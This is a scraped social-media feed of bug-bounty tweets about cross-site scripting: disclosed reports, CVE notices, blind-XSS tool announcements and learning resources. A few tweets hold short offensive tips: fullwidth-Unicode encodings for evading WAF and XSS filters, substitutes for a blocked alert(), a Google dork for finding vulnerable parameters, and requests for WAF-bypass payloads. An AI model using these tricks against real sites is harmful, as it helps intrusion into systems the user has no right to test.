@viehgroupa year agoXSS vulnerability https://t.co/HWvYrmE81i #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1606293148660944897/BxifR7s3_normal.jpg)
Manoj Khadka🇳🇵
@Manojkhda year agoDo you like 🐞deface using XSS, and I love hunting with parameter PoC #xsshunter #bugbountytips #xss https://t.co/P3d81h5JDH
![profile](https://pbs.twimg.com/profile_images/1505819877835214850/9FnQbuQN_normal.jpg)
beam
@beamsterzeroa year ago@CanYouHearBR Currently hacking your web server and doing a XSS script
![profile](https://pbs.twimg.com/profile_images/1622340160112173056/myrVvUUF_normal.jpg)
0xSe.eK
@0se0eka year agoHow to found xss(xss methodology): https://t.co/0DOcR2Bmid ----------------------- #BugBounty #BugBountyTip #bugbountytips #infosecurity #infosec #Hacking https://t.co/0sdytCoRu7
![profile](https://pbs.twimg.com/profile_images/1611746652670365696/RStyd501_normal.jpg)
Lewis
@0reoSeca year ago@inj3ct0r: #0day #Hikvision Remote Code Execution / #XSS / #SQLi #Injection #Vulnerabilities #RCE https://t.co/7E5t6LsnsV #cybersecurity #infosec @0reoSec
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoVue JS Reflected XSS https://t.co/aZbs8ZheFL #infosec #Bugbounty #bugbountytips #cybersecurity #hacking #cyberattacks
![profile](https://pbs.twimg.com/profile_images/1610955901116243970/HcShkB78_normal.jpg)
HACKLIDO | Cybersecurity
@hacklidoa year ago📩 Cyber Security Round Up #4: 150,00 EUR worth XSS, Binary Exploitation, Hacking ATMs, JavaScript Hacking, API Security, NoSQL, SSRF, IDORs & more… 🔗 https://t.co/CYMBoX4g8F --- # Tags --- #infosec #infosecurity #cybersecurity #bugbountytip #bugbountytips #ChatGPT
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_a year agoDon’t Give Up On XSS! | Fun Firefox XSS #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1616562586467684396/G-YSRH46_normal.jpg)
XSS Report
@XssReporta year ago20.000 XSS reports left behind! Over 2000 bounty hunters chose https://t.co/uVCBeExkBl. Congratulations on your bounties! #xss #bugbounty #xssreport
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoHow I found XSS on Admin Page without login! https://t.co/e153dJ6uxO #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1563603807921381376/0alLDvkg_normal.jpg)
VIEH Group
@viehgroupa year agoReflected XSS Leads to 3,000$ Bug Bounty Rewards from Microsoft Forms https://t.co/DpiQUWueZT #bug #bugs #bugbounty #bugbountytip #bugbountytips #hacking #hacker #ethicalhacking #ethicalhacker #ethicalhackers #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ Stored XSS in Public Profile Reviews 👨💻 vj1naruto ➟ https://t.co/Jg5UIutlvx ⬜ None 💰 $250.0 https://t.co/T1ZYyhwHGl #bugbounty #bugbountytips #cybersecurity https://t.co/73W2mrk8Nr
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ Stored XSS in SVG file as data: url 👨💻 @irisrumtub ➟ Shopify 🟧 Medium 💰 $5300.0 https://t.co/C7HleUXN95 #bugbounty #bugbountytips #cybersecurity https://t.co/nM1XxnCGW1
![profile](https://pbs.twimg.com/profile_images/1611746652670365696/RStyd501_normal.jpg)
Lewis
@0reoSeca year ago@packet_storm: Hikvision Remote Code Execution / XSS / SQL Injection https://t.co/DiJp59WPRN #advisory #cybersecurity #infosec @0reoSec
![profile](https://pbs.twimg.com/profile_images/1597806192239190016/NqSjX4sT_normal.jpg)
Matt Suiche
@msuichea year ago@joernchen XSS ruined infosec
![profile](https://pbs.twimg.com/profile_images/1113485744771698688/gbDDFbV1_normal.jpg)
Brier & Thorn México
@BrierandThornMXa year agoConoce mas sobre Cross Site Scripting (#XSS), checa nuestro blog sobre el tema. https://t.co/10iII0CgzV #infosec #XSS #ciberseguridad
![profile](https://pbs.twimg.com/profile_images/1611727860032487424/EDNqWQpi_normal.jpg)
int
@0x1inta year agoSuch a nice scam in #BugBounty field 😂☠️ this isn't an XSS issue. https://t.co/dD12Kv4Ffw
![profile](https://pbs.twimg.com/profile_images/1601664448925556736/xFqeWsSg_normal.jpg)
Mike Takahashi
@TakSeca year agoXSS in multi-step flows: 1. Something stored/reflected, but not w/ Repeater 2. Turn "Intercept" On 3. Submit the form on the page 4. Forward requests until you get to the reflected request 5. Inject your XSS payload 💥 #xss #bugbountytips #bugbounty #infosec #hackingtools https://t.co/MFSrEvV45M
![profile](https://pbs.twimg.com/profile_images/1610626347709112321/XFrREd5N_normal.jpg)
Goziem
@g0ziema year ago@ADITYASHENDE17 @R29k_ @akita_zen @Jhaddix @zseano @hacker_ @0x0SojalSec @abdlah_md I found an endpoint, which is &code= I think it is vulnerable to xss but it blocks (, ), <script>, ` How do I bypass cloudflare waf? #xss #BugBounty
![profile](https://pbs.twimg.com/profile_images/1619756027808718851/6bQmRyck_normal.jpg)
eagle rage
@eaglerage0a year ago20 YOUTUBE CHANNELS TO LEARN HACKING PhD security HackerSploit InsiderPhD Null byte STÖK ZSecurity Hak5 IppSec The XSS Rat Nahamsec SecurityFWD Vickie Li Dev NetworkChuck The Cyber Mentor John Hammond Rana Khalil ITProTV PwnFunction edureka! David bombal #CyberSec #BugBounty
![profile](https://pbs.twimg.com/profile_images/1520376990389440513/Y8zY5deu_normal.jpg)
Demon
@R29k_a year ago1- Found a support page. 2- It had Name,email and message fields 3- There was an option for saving your info, selecting it will save your Name and Email on the support page. 4- There was a self-xss in Name Field. 5- Chained it with CSRF and got a nice Stored XSS #BugBounty #xss
![profile](https://pbs.twimg.com/profile_images/1608133299880198155/yULlocZw_normal.jpg)
Beg Hunter
@BegHuntera year agoFull disclosing XSS ATO 0day method #0dayHunting #TogetherWeStrikeHarder #bugbountytips https://t.co/C0N7HkzmIy
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0ya year agoIf you are looking to move away from #xsshunter @XssHunter you can give a try to a new product @bxsshunter (https://t.co/VRQCgNtZht) give us a try and let us know what more features you need! #xss #xsshunter #BugBounty #bugbountytips #blindxss https://t.co/RuYeT5Mgo7
![profile](https://pbs.twimg.com/profile_images/1475684641621397511/cfuVbh5A_normal.jpg)
Glênnio
@iGlennioa year agoFalha de XSS no site da Globo no @valoreconomico permite redirecionar, infect ou roubo de sessão de cookies de outros usuários. #BugBounty #bugbountytips #Hacked #Hacking #Pentesting #cybersecuritytips #globo #GloboNews #Twitter #virus #hacker #ITSecurity #Defcon #SEC https://t.co/2I97I6aSDw
![profile](https://pbs.twimg.com/profile_images/1617726926646554624/BmmPqvup_normal.jpg)
BXSS Hunter
@bxsshuntera year ago@bxsshunter (https://t.co/vwMj0MYp29) now supports all the same features now + more of them ! go ahead and give us a try! #bxsshunter #bugbounty #bugbountytips #blindxss #bugbountytip #infosec #cybersecuritytips #cybersecurity #xss #xsstips https://t.co/MmgZXZCiLD
![profile](https://pbs.twimg.com/profile_images/1276860019418394625/Zny8G7Kl_normal.png)
Cyber Xplore
@CyberXplorea year agoExciting news! BXSS Hunter (https://t.co/PT2HFpr02C) has been updated with improved CORS detection, secret DOM detection, .git directory detection, & bug fixes! #xsshunter #bxsshunter #bugbountytips #bugbountytips #CyberSecurity #cybersecuritytips #bugbounty @bxsshunter
![profile](https://pbs.twimg.com/profile_images/1617726926646554624/BmmPqvup_normal.jpg)
BXSS Hunter
@bxsshuntera year agoExciting news! BXSS Hunter (https://t.co/vwMj0MYp29) has been updated with improved CORS detection, secret DOM detection, .git directory detection, & bug fixes! #xsshunter #xss #bxsshunter #bugbountytips #bugbountytips #CyberSecurity #cybersecuritytips #bugbounty #bxss
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0ya year ago@bxsshunter has been updated to Version 1.0.1 checkout changelog at https://t.co/DQOP2RKxso & check out new features such as 1- cors detection 2- secrets detection in dom 3- detection of .git directories #bxsshunter #xsshunter #xss #bugbountytips #bugbounty #CyberSecurity https://t.co/dkpJfKFGhl
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
@Th3Pr0xyB0ya year ago@CyberXplore is proud to announce that https://t.co/VRQCgNtZht has been updated with new features such as : 1- detection of cors issues 2- detection of secrets in dom 3- detection .git directories 4- bug fixes #xsshunter #xss #bxsshunter #bugbountytips #bugbounty @bxsshunter
![profile](https://pbs.twimg.com/profile_images/1403322076400861186/01U-3sJI_normal.jpg)
Mohamed Ibrahim
@mOhamedd7wa year agoGot XSS on #bugcrowd #bugbounty #bugbountytips https://t.co/ZtJ2AWwIGJ
![profile](https://pbs.twimg.com/profile_images/1239087154166411264/PsQN_-id_normal.jpg)
socket
@yxw21a year agoNew XSS platform released. Support using your own domain name. Support webhook. Mates with the burpsuite extension to log the full request that triggers xss. For more, please visit. https://t.co/WtUhwVFo0j #xsshunter #xss #hackerone #bugbounty #bugcrowd #bugbountytip #burpsuite https://t.co/osa82hf4qv
![profile](https://pbs.twimg.com/profile_images/1557290969766457344/xoSk7tPH_normal.jpg)
Pentester Academy
@SecurityTubea year agoEver wanted to know how XSS attacks work? Try it hands-on, for free! In this lab exercise, you will pentest a vulnerable web application with the XSSer tool. Sign in at https://t.co/vfBZUZ9khb and get started at https://t.co/9eVbY19yLq #XSS #pentest #infosec https://t.co/kNUNKFdf8C
![profile](https://pbs.twimg.com/profile_images/1470032456107675650/Y4fqzVn8_normal.jpg)
Excommunicado
@wy4210a year agoMy xsshunter triggered but it shows Cloudflare IP and the other one is not visible from where it belongs. Anyone can help me with that. @0x0SojalSec @hetmehtaa @TakSec #bxss #bugbountytip
![profile](https://pbs.twimg.com/profile_images/1167664300477026305/P16NJIIM_normal.jpg)
Chagara
@emchagaraa year agoYesterday I ran a small poll to understand what InfoSec pros consider as easy kills for beginners in cybersecurity, here is your result. So incase you want to build your confidence in hacking, start with injection attacks. Eg; XSS, SQL injection, Command Injection etc. https://t.co/W9HRPQN2LQ
![profile](https://pbs.twimg.com/profile_images/1614324150985801728/M_8Lurt5_normal.jpg)
onhexgroup
@onhexgroupa year agoگروه @trufflesec اعلام کرده ، طی صحبتی که با خالق #XSSHunter انجام دادن ، یه نسخه جدید با امکانات بیشتر از این ابزار منتشر کردن. #xss #bugbounty #باگ_بانتی https://t.co/1IGPpageUJ
![profile](https://pbs.twimg.com/profile_images/1573240538039746560/buTP5mKO_normal.jpg)
Muhammed Farish
@muhamedfarisha year agohttps://t.co/PFBHVOZRlJ #cybersecurity #bug #bugbounty #security #computerscience #networks #hacking #hacker #programming #ethicalhacking #pentesting #kalilinux #parrotos #coding #Fetlla #Medium #infosec
![profile](https://pbs.twimg.com/profile_images/1620234621664301058/JRaroJPn_normal.jpg)
Nitro Soul
@Mohamed22564239a year agoXSS by exciting script with open redirect lead to run scripts to CROSS SITE SCRIPTING https://t.co/ZY2lQoN6WP #bugbunty #bugbountytips #openredirect
![profile](https://pbs.twimg.com/profile_images/1617982870169219072/lIX7QG3n_normal.jpg)
Security Talent
@devmehedi101a year agoAlhamdulillah, I completed another big project of #penetration_testing / #ethical_hacking. Can get a #reverse_shell through DOM Based #XSS. The client was happy with me and awarded me an extra amount and gave a nice review. https://t.co/gHpYBFQcke #bugbountytip #bugbountytips https://t.co/kGI0jtK0DU
![profile](https://pbs.twimg.com/profile_images/1548889702572429314/9fWrKfah_normal.jpg)
Kali Nathalie 🏳️⚧️
@K4L1_FSa year ago[Infosec] Nem tudo são flores, eu por exemplo nunca achei um XSS em mundo real 😭 (É sério....🥲) https://t.co/zoNsAB067d
![profile](https://pbs.twimg.com/profile_images/1620183131297927170/_upI4SO3_normal.jpg)
Mohamed Yasser
@Mohamed22564239a year agoلما تبقا داخل بتراجع علي معلوماتك في لاب معين و تكتشف ثغرة xss reflected 😂😂في نص اللاب #XSS #bugbountytips #webgoat #BugBuntyHunting https://t.co/pKoVqoqYlL
![profile](https://pbs.twimg.com/profile_images/1601664448925556736/xFqeWsSg_normal.jpg)
Mike Takahashi
@TakSeca year ago🔎 Google Dork - XSS 🔍 inurl:q= | inurl:?s= | inurl:search= | inurl:query= | inurl:lang= | inurl:keyword= inurl:& site:example[.]com Find common parameters vulnerable to XSS #recon #bugbountytips #infosec #seo https://t.co/Wg7AI7gu9A
![profile](https://pbs.twimg.com/profile_images/1430451138277556224/yDiqSjga_normal.jpg)
HackGit
@hack_gita year agoXssor.go Xssor is XSS payloads reflections in source code checker. https://t.co/zIHBg4Z5qi #pentesting #bugbounty https://t.co/Iu7DPmaXVn https://t.co/2XgSSzFiq7
![profile](https://pbs.twimg.com/profile_images/1618280109223432192/pGLrEUXP_normal.jpg)
E.T
@EugenTezlawa year ago@R29k_ @NeolexSecurity @Bugcrowd Omg with simple xss and sql bugs it's really possible to earn so much money? I should return back to hacking....
![profile](https://pbs.twimg.com/profile_images/1492454333119545345/YA8wGCEf_normal.jpg)
Suyash Sharma
@SuyashS91823422a year agoReported many #bugs in many organisations This month Bug type:- 4 XSS (medium) 2 misconfigured Jenikens instances (HIGH) #bugbountytips #UPDATE #infosec #CyberSec https://t.co/MpfBsCldYF
![profile](https://pbs.twimg.com/profile_images/1617973646114566144/ddWh9SBV_normal.jpg)
Eyuga
@Eyug_aa year agoHii guys want to learn about #xss do you guys have any tutorials for me to watch or read to learn xss. #Linux @LiveOverflow @TCMSecurity #ethicalhacking #Pentesting #bugbounty
![profile](https://pbs.twimg.com/profile_images/1619646761819324416/QRUF4zOx_normal.jpg)
Prince Prafull
@PrincePrafull3a year agoSuggest some xss payloads to bypass >, <, (, ), alert, script etc. filters #xss #payloads #bugbountytips #BugBounty #webappsecurity
![profile](https://pbs.twimg.com/profile_images/1420213645900881924/rm9-MCbG_normal.png)
Hot10Security
@Hot10Securitya year agoPopular keywords used with #vulnerability tweets Date: 2023-01-29 Unique Tweets: 176 TOP 10 KEYWORDS 1: Cross 2: Site 3: Scripting 4: XSS 5: Request 6: Forgery 7: CSRF 8: CVE 9: Help 10: Desk bot-tweet #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1595178958689017856/HOhOvUub_normal.jpg)
أحْمَدُ مُحَمَّد
@ahmdmhamed_a year agoHi, This my write-up about bypassing CSRF protection via XSS https://t.co/Ss7TAOF7ij #BugBounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1331398503747252224/dz6QtVND_normal.jpg)
pizzapower
@pizzap0w3ra year agoFound some cool stuff lately: https://t.co/CwIt6sFUcI… https://t.co/zwc3TYI8zb… https://t.co/hf8fgWOlIl… https://t.co/yDSJDy5Uu6… Plus an SQLi in a big ecosystem. #cybersecurity #infosec #hacking
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0470): Cross-site Scripting (XSS) - Stored in modoboa/modoboa. https://t.co/QpCMQXOeZH Disclosed by https://t.co/yP3tBVjXCL, fixed by @modoboa_mail... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1344962042973794304/93BZHi0l_normal.jpg)
iSecurity
@iSecuritya year agoHow I was able to find 4 Cross-site scripting (XSS)on vulnerability disclosure program ? https://t.co/HQKGzj9OWz #bugbounty #websitesecurity #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1609310307469467650/zaiKnJra_normal.jpg)
Amr Mustafa
@Amr_MustafaAAa year agoI just published How I was able to find 4 Cross-site scripting (XSS) on vulnerability disclosure program https://t.co/KCEB07IpD5 #BugBounty #bugbountytips #CyberSecurity
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0519): Cross-site Scripting (XSS) - Stored in modoboa/modoboa. https://t.co/8w7uCZSFfC Disclosed by https://t.co/mmZxqUVyCn, fixed by @modoboa_mail... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1420073907038560259/UV7zAw7O_normal.jpg)
Jack
@Jaxon1177a year agoHi .. Anyone have any success using https://t.co/rvBJxswot4 tool? #BugBounty
![profile](https://pbs.twimg.com/profile_images/1464193322772217858/yA_3TB4Z_normal.jpg)
Open Source CVEs
@OpenSourceHacksa year ago(CVE-2023-0488): Cross-site Scripting (XSS) - Stored in pyload/pyload. https://t.co/5SvRCyYr57 Disclosed by @bAuholz_, fixed by @pyload... #opensource #CVE #bugbounty #security #vulnerability
![profile](https://pbs.twimg.com/profile_images/1576423044347723777/c9SjREd3_normal.jpg)
M1n@Cris
@Minacris890Ma year agoI found a Cross-site scripting (XSS) and bypassed the WAF (akamai) on one of the TikTok ads endpoint and could lead it to takeover any account on TikTok ads #BugBounty #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1598017040119365648/37ERWO1J_normal.jpg)
Ali Tütüncü
@alicanact60a year ago@bugbounty_memes It's just a Reflected XSS report template, not nuclei template or something like that 😂
![profile](https://pbs.twimg.com/profile_images/1344962042973794304/93BZHi0l_normal.jpg)
iSecurity
@iSecuritya year agoBlind XSS To SSRF https://t.co/v107lCwv5H #webapplicationsecurity #cybersecurity #bugbounty
![profile](https://pbs.twimg.com/profile_images/1557095801272373248/RmJX2gB4_normal.jpg)
RedPacket Security
@RedPacketSeca year agoHackerOne Bug Bounty Disclosure: rails-actionview-sanitize-helper-bypass-leading-to-xss-using-svg-tag-byhaqpl - https://t.co/vmPydcQxH1 #HackerOne #CVE #Vulnerability #OSINT #ThreatIntel #Cyber
![profile](https://pbs.twimg.com/profile_images/1600705047301586944/uNoJXpfG_normal.jpg)
Fares Walid
@SirBagozaa year agoPublished my .go version of xssor https://t.co/urYh2qrmwk Q: What's Xssor? A: Xssor is XSS payloads reflections in source code checker. Differences of .py version? - Quicker - Duplicated urls Skipper #infosec #bugbountytips #cybersecuritytips
![profile](https://pbs.twimg.com/profile_images/1613798309860196353/CBgJ9iKO_normal.jpg)
s3c
@s3c_krda year agoI found a Cross-site scripting (XSS) and bypassed the WAF (akamai) on one of the TikTok ads endpoint and could lead it to takeover any account on TikTok ads #BugBounty #bugbountytips https://t.co/ZFVWnjcBrg
![profile](https://pbs.twimg.com/profile_images/1554826316695814144/Qp97e98R_normal.jpg)
Anonymous H4ck3r
@AnonymousH4ck35a year agoAWESOME BUGBOUNTY TOOLS Subdomain Enumeration Port Scanning Fuzzing GraphQL/CRLF/CSRF/SQL/XSS/XXE Injections Directory Traversal Open Redirect Subdomain Takeover and more. https://t.co/JcdifiPdHX https://t.co/dBi52sMB7h
![profile](https://pbs.twimg.com/profile_images/1611746652670365696/RStyd501_normal.jpg)
Lewis
@0reoSeca year ago@SaraBadran18: RCE, SQl injection, Stored XSS in @MyBB -- Publication date :- 2023-01-25 -- By @ptswarm -- https://t.co/FrTXqlF0LK -- #hackerone #BugBounty #bugbountytips #hackeronereport #writeups #Bugbountywriteupspublished #bugbountytip https://t.co/mdTDNiDoQ4 #cyberse…
![profile](https://pbs.twimg.com/profile_images/1615635745636589569/gbAt5NNP_normal.jpg)
🐞Sara Badran
@SaraBadran18a year agoRCE, SQl injection, Stored XSS in @MyBB -- Publication date :- 2023-01-25 -- By @ptswarm -- https://t.co/6ikSFioL0r -- #hackerone #BugBounty #bugbountytips #hackeronereport #writeups #Bugbountywriteupspublished #bugbountytip https://t.co/AvKkCltRtH
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ Rails ActionView sanitize helper bypass leading to XSS using SVG tag. 👨💻 @haqpl ➟ Internet Bug Bounty 🟧 Medium 💰 $2400.0 https://t.co/36VYP3IHYG #bugbounty #bugbountytips #cybersecurity https://t.co/Ywdnjjssfd
![profile](https://pbs.twimg.com/profile_images/1617751492362121216/uwiPgsyC_normal.jpg)
Hitesh Patra
@0xdevinera year agoMade a YT video on @bxsshunter, a cool alternative to @XssHunter As you might know, #xsshunter will no longer be in support for your blind XSS hunting journey, a similar tool with additional functionality is now available. https://t.co/KpIBTTwHjs #bugbountytips #infosec
![profile](https://pbs.twimg.com/profile_images/1610367159787560961/oZSxRdxH_normal.jpg)
Abdelrhman Allam
@sl4x0a year agoResearch | Bypass CSRF Protection w/ XSS https://t.co/0OHItG5LlO #websecurity #infosec #appsec #recon #bugbountytips #bugbounty #bughunting #csrf #xss #securityresearch
![profile](https://pbs.twimg.com/profile_images/1575575364490797058/f6_XOFx5_normal.jpg)
@x1337Loser
@0xniroba year ago@0xRiy4d @yaworsk @zseano Learn basic concept of web hacking, then you Will realize which one should you learn first! Mine one is XSS then access control issue. Good luck❤️
![profile](https://pbs.twimg.com/profile_images/1438448666646253568/Ojcd-JB1_normal.png)
Dhaval Patel
@d4rk_hors3a year agofile upload to XSS #BugBounty #bugbountytips #bugbountytip #infosec #appsec #CyberSec #ethicalhacking Link: https://t.co/dqNCSBa2BI
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoHTTP Status Code for ⚡️#XSS 200, 201, 202, 203, 206 301, 302, 303, 305 400 to 417 except 407 500 to 508 #infosec
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoWhen trying for XSS if alert() is blocked you can use an alternative like⚡️. by @KathanP19 1. confirm 2. prompt 3. eval 4. write Found Some More Here👇 https://t.co/xM9XLvuoXE #infosec #cybersec #bugbountytips
![profile](https://pbs.twimg.com/profile_images/1533457001107562498/1oXfGilM_normal.jpg)
Md Ismail Šojal
@0x0SojalSeca year agoMassive XSS⚔️#infosec #bugbountytips #cybersecuritytips https://t.co/YFWnl92ljT
![profile](https://pbs.twimg.com/profile_images/1513175158307049481/xjvAVl7E_normal.png)
Programmatic.Solutions
@Programmatorisa year agoIn NodeJS, what is a good way of ensuring user submitted data in (text input) forms is not malicious? - Visit https://t.co/msfL5EiMOh for the answer. #xss #sql_injection #nodejs #infosec #softwaredevelopment
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ XSS at TikTok Ads Endpoint 👨💻 @s3c_krd ➟ TikTok 🟥 High 💰 N/A https://t.co/mm8iRQHM4B #bugbounty #bugbountytips #cybersecurity https://t.co/UrvByJ7DVA
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ XSS on ( █████████.gov ) Via URL path 👨💻 @Ajay_jachak24 ➟ U.S. Dept Of Defense 🟧 Medium 💰 N/A https://t.co/xYlX7r05xV #bugbounty #bugbountytips #cybersecurity https://t.co/AzMIp8hQC3
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ reflected xss in www.████████.gov 👨💻 maskedpersian ➟ U.S. Dept Of Defense 🟧 Medium 💰 N/A https://t.co/UknbNEO9qf #bugbounty #bugbountytips #cybersecurity https://t.co/kUsEDKsfKJ
![profile](https://pbs.twimg.com/profile_images/1575156737430425600/BIbggAKB_normal.jpg)
H1 Disclosed - Public Disclosures
@h1Discloseda year ago⚡ Reflected XSS on ██████.mil 👨💻 @alishahmughal12 ➟ U.S. Dept Of Defense 🟧 Medium 💰 N/A https://t.co/UUxpYt0b1x #bugbounty #bugbountytips #cybersecurity https://t.co/lE4djAp4TT
![profile](https://pbs.twimg.com/profile_images/659444735791210500/XGvv9R-0_normal.jpg)
Ptrace Security GmbH
@ptracesecuritya year agoBypassing Cloudflare WAF: XSS via SQL Injection https://t.co/m5iR0oCz6f #Pentesting #SQLinjection #CyberSecurity #Infosec https://t.co/iq2qnnizW3
![profile](https://pbs.twimg.com/profile_images/1607362718704766980/2ObFn1bg_normal.jpg)
Sysbraykr
@sysbraykra year agoXSS/WAF/SQL filter bypass. < - %EF%BC%9C (\uff1c) > - %EF%BC%9E (\uff1e) \ - %EF%BC%BC (\uff3c) / - %EF%BC%8F (\uff0f) ' - %EF%BC%87 (\uff07) " - %EF%BC%82 (\uff02) #bypass #xss #waf #sql #SysBraykr #BugHunting #InfoSec #WeBreakIt2SecureIt
![profile](https://pbs.twimg.com/profile_images/1590779769359958016/viD-b6ex_normal.jpg)
ABHIJITH PK
@ag3n7apka year agoStored XSS #BugBounty #xss https://t.co/0EBWAQkgd3
![profile](https://pbs.twimg.com/profile_images/1557095801272373248/RmJX2gB4_normal.jpg)
RedPacket Security
@RedPacketSeca year agoHackerOne Bug Bounty Disclosure: xss-at-tiktok-ads-endpointbys3c - https://t.co/9D5hFvRIaj #HackerOne #CVE #Vulnerability #OSINT #ThreatIntel #Cyber
![profile](https://pbs.twimg.com/profile_images/1440915079147311104/0ZxUCOBz_normal.jpg)
${Manash}
@manash036a year agoRecently, I reported an open redirect (OR) vulnerability that I was able to convert to a full account takeover. Cookies had HttpOnly enabled, so was not possible to steal directly. This is what I did 🧵👇 🏃TLDR OR=>XSS=>Steal token from /sso/refresh #BugBounty #infosec (1/n)
![profile](https://pbs.twimg.com/profile_images/1384538705797554177/o0BURm0O_normal.png)
Black Hat Ethical Hacking
@secur1ty1samytha year agoOffensive Security Tool: XSSRocket XSS Rocket is written by us with the help of #ChatGPT as experimentation and is designed for Offensive Security and #XSS (Cross-Site-Scripting) attacks. Read the full post: https://t.co/ULUCMjGZBN #infosec #informationsecurity #redteam https://t.co/XCq9XFqUZe
![profile](https://pbs.twimg.com/profile_images/1607362718704766980/2ObFn1bg_normal.jpg)
Sysbraykr
@sysbraykra year agoBypassing Cloudflare WAF: XSS via SQL Injection https://t.co/ikvHmtGPfS #SysBraykr #BugHunting #InfoSec #WeBreakIt2SecureIt
![profile](https://pbs.twimg.com/profile_images/1527679268188491776/9SZ5skNk_normal.jpg)
hemi
@jookermoona year agohttps://t.co/KVrWFi2Tna
![profile](https://pbs.twimg.com/profile_images/1420213645900881924/rm9-MCbG_normal.png)
Hot10Security
@Hot10Security2 years agoPopular keywords used with #vulnerability tweets Date: 2023-01-26 Unique Tweets: 339 TOP 10 KEYWORDS 1: Site 2: Vigil 3: Cross 4: Facebook 5: Twitter 6: Make 7: Scripting 8: XSS 9: Windows 10: CryptoAPI bot-tweet #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1584102861947998208/xmEdWPZm_normal.jpg)
0x999
@_0x9992 years agoCurrently working on a Burp Suite extension designed for Blind XSS injection in Headers, if anyone has any suggestions for additional features that should be added please do lmk, Here are the current features👇 (pls excuse the ugly UI, it's temporary) #bugbountytips #bugbountytip https://t.co/OWIZJCvG0R
![profile](https://pbs.twimg.com/profile_images/1573240538039746560/buTP5mKO_normal.jpg)
Muhammed Farish
@muhamedfarish2 years agohttps://t.co/zWnR15aofH #cybersecurity #bug #bugbounty #security #computerscience #networks #hacking #hacker #programming #ethicalhacking #pentesting #kalilinux #parrotos #coding #Fetlla #Medium #infosec
![profile](https://pbs.twimg.com/profile_images/1420213645900881924/rm9-MCbG_normal.png)
Hot10Security
@Hot10Security2 years agoPopular keywords used with #vulnerability tweets Date: 2023-01-25 Unique Tweets: 403 TOP 10 KEYWORDS 1: Cross 2: Site 3: Log 4: Scripting 5: XSS 6: Google 7: Data 8: Vigil 9: VMware 10: GoTo bot-tweet #infosec #cybersecurity
![profile](https://pbs.twimg.com/profile_images/1343113218399600641/p04QylMY_normal.jpg)
CyberIQs
@CyberIQs_2 years agoHow to Prevent Cross-Site Scripting (XSS) Attacks #infosec #infosecurity #cybersecurity #threatintel #threatintelligence #hacking #cybernews #cyberattack #cloudsecurity #malware #ransomware #cyber #threathunting #ZeroTrust #CISA https://t.co/Hu1tkKH4cQ
![profile](https://pbs.twimg.com/profile_images/1612799784754237440/9xFiZOhf_normal.jpg)
unpaired_electron
@Ajay_jachak242 years agoBlind XSS leads to data leakage But the Domain is out of scope.. Will they pay for this? What do you think ? #bugbountytips #BugBounty #hackerone #bugcrowd https://t.co/awg70DKiMX
![profile](https://pbs.twimg.com/profile_images/1617726926646554624/BmmPqvup_normal.jpg)
BXSS Hunter
@bxsshunter2 years agoFeel free to DM Us Issues Being Resolved - 1- XSS FIRE PAGE NOT LOADING WHEN MANY XSS FIRES HAPPENS 2- IP ADDRESS ALWAYS COMING 127.0.0.1 3- Some Minimal Issues #bxsshunter #bxss #bugbountytips #bugbounty https://t.co/171GmQ0MJE
![profile](https://pbs.twimg.com/profile_images/1154307934513455104/o_NShtHX_normal.jpg)
Th3Pr0xyB0y
